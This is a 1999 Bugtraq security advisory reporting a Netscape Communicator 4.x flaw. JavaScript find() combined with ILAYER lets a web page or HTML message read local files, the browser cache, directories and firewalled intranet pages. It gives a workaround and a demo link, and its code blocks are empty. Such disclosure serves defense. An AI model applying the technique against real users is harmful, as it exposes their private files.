Date: Mon, 8 Mar 1999 19:48:05 +0200 From: Georgi Guninski To: BUGTRAQ@netspace.org Subject: Netscape Communicator find() vulnerabilities There is a design flaw in Netscape Communicator 4.5 Win95, 4.08 WinNT (I guess all 4.x version are vulnerable) which allows the following security exploits: *)Reading the parsed content of local HTML files (by 'parsed' I mean the text the user sees, not the actual HTML source) *)Reading the parsed content of HTML files on a web server blocked by a firewall (the browser and the web server must be on the same side of the firewall) *)Reading user's cache *)Browsing directories *)Probably others The exploits use the JavaScript find() function and the ILAYER tag. This may be exploited using HTML message. Workaround: Disable JavaScript Demonstration is available at: http://www.nat.bg/~joro/nsfind.html -----------HTML code------------- MBEGIN MEND --------------------------------- -----------HTML code------------- MBEGIN MEND --------------------------------- Regards, Georgi Guninski http://www.nat.bg/~joro